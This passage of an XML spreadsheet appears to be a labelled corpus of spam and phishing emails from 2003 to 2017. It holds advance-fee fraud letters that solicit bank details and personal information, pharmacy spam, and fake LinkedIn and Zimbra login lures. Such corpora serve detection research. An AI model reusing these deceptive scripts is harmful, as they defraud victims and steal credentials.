    <t>Wed, 09 Feb 2005 03:47:35 -0500</t>
  </si>
  <si>
    <t>mohammad urban &lt;devamatar@members.vrna.org&gt;</t>
  </si>
  <si>
    <t>Ed Mellors &lt;jennifer@eecs.UM&gt;</t>
  </si>
  <si>
    <t>From the smile and comfort of your home.</t>
  </si>
  <si>
    <t>A wide selection of drugs for your choice on our site.\n\nOver 600 medications currently in stock at great pricing in our internet\ndrugstore. Pain Relief, Skin Care, Anti-depressants, Muscle Relaxants,\nSexual Stimulation and Weight reduction drugs are all available \n\nEnjoy easy internet order processing at our internet drugstore along with\nfast shipping and no fe e prescription.\n\nJust enjoy low cost medicines on our site. We will make you enjoy the\nlowest pricing.\n\nRx refill used to make my headache worse. Now with internet pharmacy\neverything is taken care of as order processing, order update, delivery. I\ncan  just sit there and relax now.    -- Headache No More\n\n[URL]http://dy.HK.wholelotofjoy.com[/URL]\n\n\naboard. NASA has said it plans to resume its shuttle program in May.Curtis\nnods. Whatcan he say?On the military flight to the forward operating post at\nKhost, the goodwill tour\npictures of the barren mountains. He takes mental notes to tweak his\nmonologue for an upcoming\ncontinuity girl7 conicoovoid 6boil over fistwise  consternations\n\n\n\n\n</t>
  </si>
  <si>
    <t>http://dy.HK.wholelotofjoy.com</t>
  </si>
  <si>
    <t>2413</t>
  </si>
  <si>
    <t>To: nan\nFrom: muhamed bello &lt;muhamed_bello33@hotmail.com&gt;\nDate: Wed, 09 Aug 2006 22:52:37 +0000</t>
  </si>
  <si>
    <t>Wed, 09 Aug 2006 22:52:37 +0000</t>
  </si>
  <si>
    <t>muhamed bello &lt;muhamed_bello33@hotmail.com&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Your Response Needed ASAP </t>
  </si>
  <si>
    <t>FROM THE DESK OF MR.MUHAMED BELLO\nAUDITING AND ACCOUNTING MANAGER ,\nBANK OF AFRICAN B.O.A\nOUAGADOUGOU-BURKINA FASO.\n\nDEAR FRIEND ,\n\nI AM THE MANAGER OF AUDITING AND ACCOUNTING AT THE FOREIGN REMITTANCE \nDEPARTMENT OF BANK OF AFRICAN) HERE IN OUAGADOUGOU, BURKINA FASO. IN MY \nDEPARTMENT WE DISCOVERED AN ABANDONED SUM OF US$12.5M DOLLARS (TWELVE \nMILLION FIVE HUNDRED THAUSAND US DOLLARS) IN AN ACCOUNT THAT BELONGS TO ONE \nOF OUR FOR EIGN CUSTOMER (MR. ANDREAS SCHRANNER FROM MUNICH, GERMANY) WHO \nDIED ALONG WITH HIS ENTIRE FAMILY IN JULLY 2000 IN A PLANE CRASH. SINCE WE \nGOT INFORMATION ABOUT HIS DEATH, WE HAVE BEEN EXPECTING HIS NEXT OF KIN TO \nCOME OVER AND CLAIM HIS MONEY BECAUSE WE CANNOT RELEASE IT UNLESS SOME BODY \nAPPLIES FOR IT AS NEXT OF KIN OR RELATION TO THE DECEASED AS INDICATED IN \nOUR BANKING GUIDLINGS AND LAWS BUT UNFORTUNATELY WE LEARNT THAT ALL HIS \nSUPPOSED NEXT OF KIN OR RELATION DIED ALONGSIDE WITH HIM AT THE PLANE CRASH \nLEAVING NOBODY BEHIND FOR THE CLAIM.IT IS THEREFORE UPON THIS DISCOVERY THAT \nI NOW DECIDED TO MAKE THIS BUSINESS PROPOSAL TO YOU AND RELEASE THE MONEY TO \nYOU AS THE NEXT OF KIN OR RELATION TO THE DECEASED FOR SAFETY AND SUBSEQUENT \nDISBURSEMENT SINCE NOBODY IS COMING FOR IT AND WE DON'T WANT THIS MONEY TO \nGO INTO THE BANK TREASURY AS UNCLAIMED BILL.THE BANKING LAW AND GUIDLINE \nHERE STIPULATES THAT IF SUCH MONEY REMAINED UNCLAIMED AFTER FIVE YEARS, THE \nMONEY WILL BE TRANSFERED INTO THE BANK TREASURY AS UNCLAIMED FUND. THE \nREQUEST OF FOREIGNER AS NEXT OF KIN IN THIS BUSINESS IS OCCASSIONED BY THE \nFACT THAT THE CUSTOMER WAS A FOREIGNER AND A BURKINABE CANNOT STAND AS NEXT \nOF KIN TO A FOREIGNER.\n\nI AGREE THAT 30% OF THIS MONEY WILL BE FOR YOU AS A RESPECT TO THE PROVISION \nOF A FORIEGN ACCOUNT ,10% WILL BE SET ASIDE FOR EXPENSES INCURRED DURING THE \nBUSINESSAND 60% WOULD BE FOR ME THEREAFTER, I WILL VISIT YOUR COUNTRY FOR \nDISBURSEMENT ACCORDING TO THE PERCENTAGE INDICATED THEREFORE, TO ENABLE THE \nIMMEDIATE TRANSFER OF THIS FUND TO YOU ARRANGED,YOU MUST APPLY FIRST TO THE \nBANK AS RELATION OR NEXT OF KIN OF THE DECEASED WITH A TEXT OF APPLICATION \nTHAT I WILL SEND TO YOU,SO I WILL LIKE YOU TO SEND TO ME YOUR PRIVATE \nTELEPHONE AND FAX NUMBER FOR EASY AND EFFECTIVE COMMUNICATION AND LOCATION \nWHERE IN THE MONEY WILL BE REMITTED.UPON RECEIPT OF YOUR REPLY, I WILL SEND \nTO YOU BY FAX OR EMAIL THE TEXT OF THE APPLICATION.\n\nI WILL NOT FAIL TO BRING TO YOUR NOTICE THIS TRANSACTION IS HITCH-FREE AND \nTHAT YOU SHOULD NOT ENTERTAIN ANY ATOM OF FEAR AS ALL REQUIRED ARRANGEMENTS \nHAVE BEEN MADE FOR THE TRANSFER. YOU SHOULD CONTACT ME IMMEDIATELY AS SOON \nAS YOU RECEIVE THIS LETTER WRITING ME TO MY PRIVATE EMAIL \nADDRESS:MUHAMED_BELLO7@LATINMAIL.COM,\nTRUSTING TO HEAR FROM YOU IMMEDIATELY.\n\nYOURS FAITHFULLY,\n\n1. FULL NAME\n2. YOUR TELEPHONE NUMBER AND FAX NUMBER\n3. YOUR CONTACT ADDRESS.\n\nMR.MUHAMED BELLO\n\n_________________________________________________________________\nTestez Windows Llive Mail Beta ! \n[URL]http://www.msn.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>2409</t>
  </si>
  <si>
    <t>To: nan\nFrom: Tony Abbas &lt;tonyabbas@saguntomail.com&gt;\nDate: Wed, 09 Aug 2006 20:18:06 +0200</t>
  </si>
  <si>
    <t>Wed, 09 Aug 2006 20:18:06 +0200</t>
  </si>
  <si>
    <t>Tony Abbas &lt;tonyabbas@saguntomail.com&gt;</t>
  </si>
  <si>
    <t>Greetings/Urgent!</t>
  </si>
  <si>
    <t>Abbas Chambers,\nplot 27 surulere\nLagos, Nigeria.\nTel : +234-805-823-3576\nEmail : abbaschambers@abbaschambers.org\n\nDear Friend,\n\n    Compliments of the day, I hope that this letter will not constitute a sort\nof embarrasement to you. Please bear with me let me introduce myself. I am\nBarrister Tony Abbas, the attorney to Late Engr Alex, a National of your\ncountry, who owned a metal producing factory (Metalco Enterprise) in Nigeria\nand a personal friend died and left behind his deposit in a finance house\n(GLOBAL SECURITIES &amp; FINANCE COMPANY) valued at $14.5Millon (Fourteen Million\nFive Hundred Thousand United States Dollars Only).\n\n    My relationship with Engr.Alex started in 1999 when I was working\nwith the security company as a Legal Adviser, Marina branch. We met in my social\nclub's annual end of the year party and I introduced him to the said security\ncompany where he deposit most of his treasures some few weeks later,making me\nthe Legal officer to the account which he operated until his unfortunate\ndemise.On the 31st of March 2001, Engr.Alex, his wife and their two children\nwere involved in a car accident. All occupants of the vehicle unfortunately\nlost their lives.\n    After the incident i contacted Engr.Alex sister (Ms Martha Stevens)\nwhich was his beneficiary/next of kin but unfortunately before she\ncould claim his estate she too died in September 11, 2001 terrorist\nattack at the world trade center in the United State Of America. See\n[URL]http://edition.cnn.com[/URL]\n\n    Since then I have made several enquiries to locate any of Engr.Alex\nextended relatives this has also proved unsuccessful. After these\nseveral unsuccessful attempts, I decided to track his last name over\nthe Internet, to locate any member of his family or anyone related to him hence\nI contacted you . Since I have been unsuccessful in locating the relatives for\nover 2 years now I seek your consent to present you as the next of kin to the\ndeceased so that the proceeds of this account valued at US$14.500,000 (Fourteen\nMillion Five Hundred Thousand United States Dollars Only) can be paid to you and\nthen you and I can sharethe money.70% to me and 30% to you.The request of a\nforeigner as next of kin in this business is occasioned by the fact that My\nclient was a foreigner and a Nigerian cannot stand as a next of kin to a\nforeigner.\n\n    I am ready to re-negotiate the mode of sharing with you.Thereafter I will\nvisit your country for the disbursement/investing of my share according to the\npercentages we agreed upon.If you find this proposal suitable for you do get\nback to me with the following informations Your full Name and Contact\nAddress,Your private telephone Number Your Age Your Occupation and Position.\n\n    All I require is your honest cooperation to enable us see this deal\nthrough.I guarantee that this will be executed under a legitimate arrangement\nthat will protect you from any breach of the law. Please for the sake of\nconfidentiality send your reply to my private email :\nabbaschambers@abbaschambers.org or call +234-805-823-3576.\n\nHoping to receive a positive response from you.\n\nBest regards,\n\nBarrister Tony Abbas.\n\n\n\n\n</t>
  </si>
  <si>
    <t>http://edition.cnn.com</t>
  </si>
  <si>
    <t>2410</t>
  </si>
  <si>
    <t>To: nan\nFrom: jim &lt;jim_kwesi20@myway.com&gt;\nDate: Wed, 09 Aug 2006 16:29:33 -0400</t>
  </si>
  <si>
    <t>Wed, 09 Aug 2006 16:29:33 -0400</t>
  </si>
  <si>
    <t>jim &lt;jim_kwesi20@myway.com&gt;</t>
  </si>
  <si>
    <t>YOUR KIND ASSISTANC</t>
  </si>
  <si>
    <t>\nFrom: Mr.Jim Kwesi\n\nPrivate Number:+23324641745\n\nEMAIL ;jim_kwesi50\n\n\n\n My name is Jim Kwesi I am the regional manager of Barclays Bank of Ghana takoradi branch in the western region of Ghana. I got your information on a recent bank conference with other West African countries held in Lome the capital city of Togo in West Africa.\n\n \n\n I write you this proposal in good faith; I am 45 years old married with four children. I am a devoted Christian and a man of peace.\n\nI have packaged a financial transaction that will benefit you and me, as the regional manager of the Barclays I am 45 years old married with four children. I am a devoted Christian and a man of peace\n\n\n\n I am 45 years old married with four children. I am a devoted Christian and a man of peace.   I have packaged a financial transaction that will benefit you and me, as the regional manager of the Barclays bank it is my duty to send in a financial report to my head office in the capital city Accra at the end of each business yea\n\nr. On the course of 2005 business report, I discovered that my branch in which I am the manager made two million five hundred and fifty thousand united state dollars ($2,550,000.00) which\n\n\n\n my head office are not aware of and will never be aware of.\n\nI have placed this funds on what we call escrow call account with no beneficiary. As an officer of this bank I cannot be directly connected to this money, so my aim of contacting you is to assist me receive this money in your bank account and get 30% of the total funds as commission.\n\n\n\nThere are practically no risks involved, it will be a bank-to-bank transfer, and all I need from you is to stand claim as the original depositor of these funds who made the deposit with my branch so that my head office can order the transfer to your designated bank account.   If you accept to work with me I will appreciate it very much.\n\n\n\nIf you accept to work with me I will appreciate it very much. You call me so that we can go over the details. Thank you in advance and May God bless you and your family.\n\n\n\nYours truly Mr.Jim Kwesi \n\n_______________________________________________\nNo banners. No pop-ups. No kidding.\nMake My Way  your home on the Web - [URL]http://www.myway.com[/URL]\n\n\n\n\n</t>
  </si>
  <si>
    <t>http://www.myway.com</t>
  </si>
  <si>
    <t>387</t>
  </si>
  <si>
    <t>To: webmaster@aclweb.org\nFrom: MRS.MARYAM ABACHA &lt;firstlady234@post.cz&gt;\nDate: Wed, 08 Oct 2003 23:51:16 +0100</t>
  </si>
  <si>
    <t>Wed, 08 Oct 2003 23:51:16 +0100</t>
  </si>
  <si>
    <t>MRS.MARYAM ABACHA &lt;firstlady234@post.cz&gt;</t>
  </si>
  <si>
    <t>I NEED YOUR URGENT HELP PLEASE</t>
  </si>
  <si>
    <t>ATTENTION:\nDear Sir,\nI am Dr (Mrs)Maryam Abacha, wife to the late Nigeria\nHead of state, General Sani Abacha who died on the 8th\nof june 1998 while still on active duty . I am\ncontacting you in view of the fact we will be of great assistance to each\nother, likewise developing acordial business relationship. I currently have\nwithin my reach the sum of Thirty Million United States Dollars\n($30,000,000.00) cash, which I intend to use for investment purposes\nspecifically in your country.\nThis money came as a result of a pay-back\ncontract deal between my late husband and a Russian firm in our country's\nMulti-billion dollar Ajaokuta Steel plant. The Russian firm in our country's\nMulti-billion dollar Ajaokuta Steel Plant. The Russian partners returned my\nHusband's share of US$30,000,000.00 U.S.D after his death, and lodged it in\nmy late husband's Security Company of which I am a Director Right now, the\nnew Civilian Government has intensified their probe on my late husband's\nfinancial resources and have frozen our accounts. In view of these facts, I\nacted fast to withdraw the US$30,000,000.00 U.S.D from the company's vault\nand deposited it in a privately owned security safe in . I have\nsince declared the security company bankrupt.\n\nNo record whatsoever exists concerning the money traceable by the Government because, there is no\ndocumentation showing that we received the money from the Russians. Due to\nthe current situation in the country concerning the Government's attitude\ntowards my family, it has become quite impossible for me to make use of this\nmoney within; thus upon your consent, I shall expect you to contact me\nurgently to enable us discuss indetail about this transaction. Bearing in\nmind that your assistance is needed to transfer this fund, I propose a\ncommission of 20% (Twenty percent) of the total sum to you for the expected\nservices and assistance. Your urgent response is highly needed so as to stop\nfurther contact.\n\nAll correspondence must be by\ne-mail. I must use this opportunity to implore you to exercise the utmost\nindulgence to keep this matter extraordinary confidential, whatever your\ndecision, while I await your prompt response.\n\nPlease visit this website :\n[URL]http://allafrica.com[/URL]\nBest Regards,\nMRS MARYAM ABACHA\nPLEASE SEND YOUR PHONE AND FAX FOR ORAL DISCUSSION.\n\n\n\n\n\n</t>
  </si>
  <si>
    <t>http://allafrica.com</t>
  </si>
  <si>
    <t>1881</t>
  </si>
  <si>
    <t>To: nan\nFrom: salif zongo &lt;sliazongo50@hotmail.com&gt;\nDate: Wed, 08 Mar 2006 23:57:24 +0000</t>
  </si>
  <si>
    <t>Wed, 08 Mar 2006 23:57:24 +0000</t>
  </si>
  <si>
    <t>salif zongo &lt;sliazongo50@hotmail.com&gt;</t>
  </si>
  <si>
    <t>TREAT AS URGENT AND CALL ME:+226 7650 9277.</t>
  </si>
  <si>
    <t>&gt;From The Desk Of Of SALIF ZONGO.\nThe Head Of File Department,\nAfrican Development Bank A.D.B\nOuagadougou Burkina-Faso Annex.\nWest Africa.\nPhone: 00226-7650 9277.    this is my private email address: \nslianzongo1@yahoo.com\n\nPLANE CRASH WEB SITE...[URL]http://news.bbc.co.uk[/URL]\n\n                        ("REMITTANCE OF $12 MILLION U.S.A DOLLARS\n                                        CONFIDENTIAL IS THE CASE")\n\nCompliment Of The Season,\n\nOn a very good day. I am (SALIF ZONGO),The Head of file Department in \nAfrican developent bank (ADB).I got your contact from Yahoo tourist search.\n\nWhen i was searching for a foreign partner i assured of your capability and \nreliability to champion this businees opportunity when i prayed to God or \nAllah about you.In my department we discovered an abandoned sum of Twelve \nmillion U.S.Dollars ( 12M Us$) . In an account that belongs to one of our \nforeign customer who died along with his entire family in (Monday 31st July \n2000) in a plane crash.\n\nSince we got information about his death, we have been expecting his next of \nkin to come over and claim his money because we cannot release it unless \nsomebody applies for it as next of kin or relation to the deceased as \nindicated in our banking guidelines, but unfortunately we learnt that all \nhis supposed next of kin or relation died alongside with him at the plane \ncrash leaving nobody behind for the claim. It is therefore upon this \ndiscovery that I and one official in my department now decided to make this \nbusinness proposal to you and release the money to you as the next of kin or \nrelation to the deceased for safety and subsequent disbursement since nobody \nis coming for it and we dont want this money to go into the bank treasury \nas unclaimed bill.\n\nThe Banking law and guideline here stipulates that if such money remained \nunclamed after five years, the money will be transfered into the Bank \ntreasury as unclaimed fund. The request of foreigner as next of kin in this \nbusiness is occasioned by the fact that the customer was a foreigner, and a \nBurkinabe cannot stand as next of kin to a foreigner. We agree that 30 % of \nthis money will be for you as foreign partner, in respect to the provision \nof a foreign account, 10 % will be set aside for expenses incured during the \nbusiness and 60 % would be f or me and my woman colleague. There after i \nwill visit your country for disbursement according to the percentages \nindicated.\n\nTherefore to enable the immediate trnansfer of this fund to you as arranged, \nyou must apply first to the bank as relations or next of kin of the deceased \nindicating your bank name, your bank account number, your private telephone \nand fax number for easy and effective communication and location where the \nmoney will be remitted.Upon receipt of your reply, I will send to you by fax \nor email the text of the application I will not fail to bring to your notice \nthat this transaction is hitch free and that you should not entertain any \natom of fear as all required arrangements have been made for thetransfer.\n\nYou should contact me on my number 00226-7650 9277, immediately as soon as \nyou receive this letter. Trusting to hear from you immediately.\n\nYours faithfully,\n\nSALIF ZONGO\n\nPOST SCRITUM:You have to keep everything secret as to enable the transfer to \nmove very smoothly in to the account you will prove to the bank. As you \nfinish reading this letter call me immediately so that we discuss very well \nover this business.\n\n_________________________________________________________________\nMSN Messenger: appels gratuits de PC  PC ! \n[URL]http://www.msn.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>256</t>
  </si>
  <si>
    <t>To: jose@monkey.org\nFrom: "Linkedin" &lt;likedinn@outlook.com&gt;\nDate: Wed, 08 Jun 2016 09:13:52 +0700</t>
  </si>
  <si>
    <t>Wed, 08 Jun 2016 09:13:52 +0700</t>
  </si>
  <si>
    <t>"Linkedin" &lt;likedinn@outlook.com&gt;</t>
  </si>
  <si>
    <t>Linkedin Update!</t>
  </si>
  <si>
    <t>Dear Linkedin User\n\nDue to the recent upgrade in linkedin you have to upgrade your account to keep using linkedin  or your account will be terminated.\nIn order to login click the link below\n[URL]http://www.pittsburghwomens.clinic[/URL]\nto login and wait for responds from linkedin.\nWe apologies for any inconvenience and appreciate your understanding.\n\nRegards\n\nLINKEDIN.\n\n</t>
  </si>
  <si>
    <t>http://www.pittsburghwomens.clinic</t>
  </si>
  <si>
    <t>1350</t>
  </si>
  <si>
    <t>To: nan\nFrom: Mr. Olsom Berghart &lt;berolsom@mail2world.com&gt;\nDate: Wed, 08 Jun 2005 06:40:12 -0400</t>
  </si>
  <si>
    <t>Wed, 08 Jun 2005 06:40:12 -0400</t>
  </si>
  <si>
    <t>Mr. Olsom Berghart &lt;berolsom@mail2world.com&gt;</t>
  </si>
  <si>
    <t>\nGooday, \n\nI am Mr Olsom Berghart a personal treasurer to Mikhail Khodorkovsky the richest man in Russia and owner of the following companies:Chairman CEO: YUKOS OIL (Russian Most Largest Oil Company)Chairman CEO: Menatep SBP Bank (A well reputable financial institution with its branches all over the world)\n\n SOURCE OF FUNDS: \nI have a profiling amount in an excess of US$100.5M, which I seek your partnership in accommodating for me. You will be rewarded with 4% of the total sum for your partnership. Can you be my partner on this? \n\nINTRODUCTION OF MY SELF \nAs a personal consultant to him, authority was handed over to me in transfer of money of an American oil merchant for his last oil deal with my boss Mikhail Khodorkovsky. Already the funds have left the shore of Russia to an European private bank where the final crediting is expected to be carried out. \n\nWhile I was on the process, My Boss got arrested for his involvement in politics by financing the leading and opposing political parties (the Union of Right Forces, led by Boris Nemtsov, and Yabloko, a liberal/social democratic party led by Gregor Yavlinsky) which poses treat to President Vladimir Putin second tenure as Russian president. \n\nYou can catch more of the story on this website: \n[URL]http://www.yukos.com[/URL]\n[URL]http://www.opendemocracy.net[/URL] [URL]http://newsfromrussia.com[/URL] \n\nYOUR ROLE: \nAll I need from you is to stand as the beneficiary of the above quoted sum and I will re-profile the funds with your name, which will enable the European bank transfer the sum to you. I have decided to use this sum to relocate to American continent and never to be connected to any of Mikhail Khodorkovsky conglomerates. \n\nThe transaction has to be concluded in 2 weeks before Mikhail Khodorkovsky is out on bail. As soon as I confirm your readiness to conclude the transaction with me, I will provide you with the details. \n\nThank you very much. \n\nRegards,\n\nOlsom Berghart(Mr) \n\nNB: Please contact me through this secure email: berolsom@indiatimes.com \n\n\n___________________________________________________________________________\n\n\n\n</t>
  </si>
  <si>
    <t>http://www.yukos.com http://www.opendemocracy.net http://newsfromrussia.com</t>
  </si>
  <si>
    <t>483</t>
  </si>
  <si>
    <t>To: jose@monkey.org\nFrom: "Zimbra Alert"&lt;infoz@zimbra.com&gt;\nDate: Wed, 08 Feb 2017 12:19:24 +0100</t>
  </si>
  <si>
    <t>Wed, 08 Feb 2017 12:19:24 +0100</t>
  </si>
  <si>
    <t>"Zimbra Alert"&lt;infoz@zimbra.com&gt;</t>
  </si>
  <si>
    <t>Dear jose@monkey.org ,  Your account has exceeded it quota limit as set by Administrator, and you may not be able to send or receive new mails until you Re-Validate your jose@monkey.org account.  To Re-Validate jose@monkey.org account, Please CLICK: Re-Validate jose@monkey.org Account  --- This email has been checked for viruses by Avast antivirus software. [URL]https://www.avast.com[/URL] Dear jose@monkey.org ,  Your account has exceeded it quota limit as set by Administrator, and you may not be able to send or receive new mails until you Re-Validate your jose@monkey.org account.  To Re-Validate jose@monkey.org account, Please CLICK: Re-Validate jose@monkey.org Account 				This email has been checked for viruses by Avast antivirus software. 				[URL]www.avast.com[/URL]</t>
  </si>
  <si>
    <t>1032</t>
  </si>
  <si>
    <t>To: dev@nutch.org\nFrom: Joshua Oliver &lt;joshua.oliver@gmail.com&gt;\nDate: Wed, 08 Dec 2004 12:10:18 +1100</t>
  </si>
  <si>
    <t>Wed, 08 Dec 2004 12:10:18 +1100</t>
  </si>
  <si>
    <t>Joshua Oliver &lt;joshua.oliver@gmail.com&gt;</t>
  </si>
  <si>
    <t>dev@nutch.org</t>
  </si>
  <si>
    <t>Re: [Nutch-dev] URGENT FUND TRANSFER\\ INVESTMENT</t>
  </si>
  <si>
    <t>is this spam On Tue, 7 Dec 2004 15:44:53 -0500 (EST), john koromah  wrote: &gt;  &gt;  &gt; FROM:JOHN  KOROMAH  &gt;  &gt; PHON:27-73-267-1376  &gt;  &gt; EMAIL: johnko00041@yahoo.ca  &gt;  &gt;  &gt; ATT: DIRECTOR/CEO,  &gt;  &gt; I got your contact through the South African Trade and  &gt; Business Information Services by a very    reliable  &gt; friend of mine who introduced your capability,  &gt; personality and business address to me.  &gt;  &gt; I am MR john Koromah(Jnr) the eldest son of Major  &gt; Johnny john Koromah,the former military head of state  &gt; of  the  Republic of Sierra Leone.  My father was  &gt; involved in the plot to overthrow the then president  &gt; Tejan Ahmed Kabba. He amongst others were found guilty  &gt; by the then special military tribunal.  &gt;  &gt; The government seized all my father's properties and  &gt; assets. When the West African Peace  Keeping  &gt; Forces(ECOMOG) arrived we escaped to South  &gt; Africa where we sought and were granted asylum.  My  &gt; purpose of contacting you is to solicit your  &gt; assistance to transfer some funds.Recently,while I  &gt; was  going through  &gt; my father's documents(files)I  discovered  that there  &gt; are some amount of money which was  generated from the  &gt; sales of my county's treasure i.e. diamonds,amounting  &gt; to a total of US$27.8M(TWENTY SEVEN Million Eight  &gt; Hundred Thousand United States Dollars)  which he  &gt; secretly deposited with a private security  company  &gt; here in South Africa in coded cash.My family has  &gt; mandated me to secretly contact a foreign partner that  &gt; is reliable and trustworthy so that we can pay in this  &gt; money into his account outside South Africa.  Our  &gt; resolve to use a foreigner is due to my father's name  &gt; which may attract attention and result in seizure of  &gt; this money.  &gt;  &gt; Moreover the present civilian government of Tejan  &gt; Kabba has frozen all overseas account owned by the  &gt; coup leaders, which of course includes my father. I  &gt; have in my possession all the documents with which the  &gt; money will be easily transferred to your account over  &gt; seas. My lawyer has promised to assist me move this  &gt; money as soon as we have the necessary contact that is  &gt; reliable and trustworthy.  &gt;  &gt; Since I got your contact through the information  &gt; service here, I believe that you will meet our  &gt; standard  and that you will not take undue advantage of  &gt; my  situation and that of my family. It may be  &gt; necessary  for you to furnish me with your bank  &gt; details(either  private or company's account)where this  &gt; money will  be  deposited or come to South Africa to  &gt; open a Remittance  Account(Non Resident Account)in you  &gt; name or that of  your company where we can pay in this  &gt; money before  it  can be transferred to your  &gt; account overseas on the  conclusion of this  &gt; transaction.  &gt;  &gt; Immediately this money is confirmed to be in your  &gt; account ,my mother and I will come over to your  &gt; country to invest it. We urgently need your  &gt; sincereCo-operation. Be assured that the transfer of  &gt; this money into your account will be in a matter of  &gt; days going by the assurance of my lawyer. I assure  &gt; that nobody knows about this transaction except my  &gt; mother, the lawyer and myself.  &gt;  &gt; In appreciation of your effort and assistance, I have  &gt; worked out the sharing ratio for this transaction as  &gt; follows 60% for my investment under your close  &gt; supervision and directions,30% for your efforts and we  &gt; shall set aside 10% for all incidental expenses. We  &gt; are looking up to your assistance and I know you will  &gt; not fail us.  &gt;  &gt; As soon as you get this message, send me a reply or  &gt; contact me with the phone number written above for  &gt; further clarifications on this transaction.  &gt;  &gt; Yours Faithfully  &gt; MR.JOHN KOROMAH(JNR)  &gt;  &gt; N/B: Be free to assist me on this transaction because  &gt; it is risk free on your personality going by the  &gt; assurance and help of my lawyer.  &gt;  &gt;  &gt; ________________________________ &gt; Do you Yahoo!? &gt; Yahoo! Mail - Easier than ever with enhanced search. Learn more.  &gt;  &gt; ------------------------------------------------------- SF email is sponsored by - The IT Product Guide Read honest &amp; candid reviews on hundreds of IT Products from real users. Discover which products truly live up to the hype. Start reading now.  [URL]http://productguide.itmanagersjournal.com[/URL] _______________________________________________ Nutch-developers mailing list Nutch-developers@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://productguide.itmanagersjournal.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>3260</t>
  </si>
  <si>
    <t>To: nan\nFrom: emma tano &lt;ball16@hotmail.fr&gt;\nDate: Wed, 08 Aug 2007 13:51:02 +0000</t>
  </si>
  <si>
    <t>Wed, 08 Aug 2007 13:51:02 +0000</t>
  </si>
  <si>
    <t>emma tano &lt;ball16@hotmail.fr&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour, </t>
  </si>
  <si>
    <t>\n Bonjour,  Vous serez peut-être étonné de recevoir ce message cela est tout à fait normal mais permettez-moi de  me confier à vous. Je pense que vous êtes digne de la recommandation de ma prière, donc une personne honorable de confiance avec qui je peux faire des affaires. Ainsi je n'ai aucune hésitation à me fier à vous pour des affaires simples et sincères. Je suis Tiémoko Yoro Wahonon Françoise la fille unique de mes défunts parents M. et Mme Yoro Tiémoko Edmond Ivoirien d'origine Burkinabé. Mon père était un grand fermier et exploitant d'or à Abidjan la capitale économique de la Côte d’ Ivoire. Ma mère est morte quand j'étais toute petite et depuis lors mon père m'a pris en charge. Deux mois avant l'assassinat de mon père mort le 30 octobre 2006 sous mes yeux, il m'a secrètement appelé et m'a indiqué qu'il a déposé la somme de 5 millions d'Euro dans une compagnie de sécurité ici à Abidjan, Cet argent qui représente le fruit de ces années de travail devrait nous permettre de quitter le pays pour recommencer une vie loin de la politique de notre pays qui devenait dangereuse. Malheureusement mon père a été tué froidement par des hommes armés. Présentement j'ai du fuir ma maison pour éviter d'être aussi  victime de la barbarie de ces gens, je vous écris afin que vous puissiez m'aider a retirer cet argent de la compagnie de sécurité, et le sécuriser dans votre pays. Aussi j'aimerais que vous puissiez m'aider à vous rejoindre en vue de recommencer une nouvelle vie comme souhaitée par mon défunt père.Le colis a été enregistré comme bien de famille. La compagnie ne connaît donc pas le contenue du colis. Si vous êtes disposé à m'aider je vous ferais parvenir plus de précision afin que vous puissiez rentrer en contact avec la compagnie de sécurité. Ainsi dit, je suis disposée à vous offrir 15% de mon héritage en compensation pour votre effort après le retrait de ces fonds de la compagnie et son transfert dans votre compte bancaire. En outre, indiquez moi vos options pour m'aider sachant que pour moi, j’ai la foi que cette transaction peut se faire le plus vite possible. J’aimerais avoir votre point de vue sur cette question et cela selon votre disponibilité. Vous pouvez me joindre à mon adresse électronique: yoro_fanoise@yahoo.fr Merci, et que Dieu vous bénisse.  Veuillez consulter ce lien ci dessous [URL]http://news.abidjan.net[/URL] Tiémoko Yoro Wahonon Françoise \n \n_________________________________________________________________\nTéléchargez le nouveau Windows Live Messenger !\n[URL]http://get.live.com[/URL]</t>
  </si>
  <si>
    <t>http://news.abidjan.net http://get.live.com</t>
  </si>
  <si>
    <t>2946</t>
  </si>
  <si>
    <t>To: nan\nFrom: BARNETT SCOTT &lt;barnett_scott@web2mail.com&gt;\nDate: Wed, 07 Mar 2007 18:03:59 -0800</t>
  </si>
  <si>
    <t>Wed, 07 Mar 2007 18:03:59 -0800</t>
  </si>
  <si>
    <t>BARNETT SCOTT &lt;barnett_scott@web2mail.com&gt;</t>
  </si>
  <si>
    <t>STAND AS THE NEXT-OF-KIN/BENEFACTOR.</t>
  </si>
  <si>
    <t>\nBarrister Barnett Scott\nScott &amp; Associates\nLondon-England\nbarnett_scott@web2mail.com\n\nI am sorry for contacting you through this medium without a previous\nnotice, I had to use the E-mail because it is an easier\n\nand more confidential way of making contact with people around the world.\nMy name is Barrister Barnett Scott,a forty five (45)\nyear old Attorney in practice here in London-England. I had a client by\nname Mr.Victor a contractor based in Sri-\nlanka/Indonesia now deceased. My client lost his life alongside his wife\nand only child in aceh sri-lanka. Details of this\nincidence can be checked on the following\nwebsite;[URL]http://news.bbc.co.uk[/URL]\nprior to the death of my late client, He secured a contract of\n$12,500,000.00 million from the sri-lanka/Indonesia\ngovernment, following which he received a 30%mobilization fee of\nUS$3,750,000.00 Million and successfully executed the\ncontract, but the balance of US$8,750,000.00 Million contract payment was\nin the Process of being transferred into my late\nclient's account which he submitted to the government when he lost his\nlife in the incidence.\nFew days after his sudden Death,The government of Indonesia effected the\ntransfer of the balance of his Contract Funds into\nthe account that my late client has on his file with the government. As\nhis personal Attorney before his death,I have been\nofficially notified and instructed by the bank here in U.K where the money\nis currently deposited that I should provide and\nforward the particulars of Mr.Victor's next of kin so that the Funds in\nhis account can be remitted into his Next of Kin's\naccount in accordance with British Laws.\n\nHowever, as the personal attorney and close confidant of late Mr.Victor, I\nwant you to know that my late client died\ninterstate, i.e, He died without leaving a Will.Hence,all my efforts to\nlocate any of his relative whom I can present to the\nbank has proved abortive.\nTherefore I am seeking for your consent to present you as the deceased\nrelative/next of kin and subsequently the beneficiary\nof the fund so that the proceed of this account valued at US$12,500,000.00\nMillion can be paid to you for subsequent\ndisbursement between you and I. If you can cooperate with me and receive\nthis funds as next of kin to Mr.Victor, confirm your\ninterest by contacting me through my E-mail:- barnett_scott@web2mail.com\nI can assure you that the deal is 100% risk free because i am in possesion\nof the deceased personal file which contains all\ninformation which I shall use to prove your relationship with the deceased\ntherefore the money will be paid into the account\nof whomever I present as Mr.Victor's Next of kin 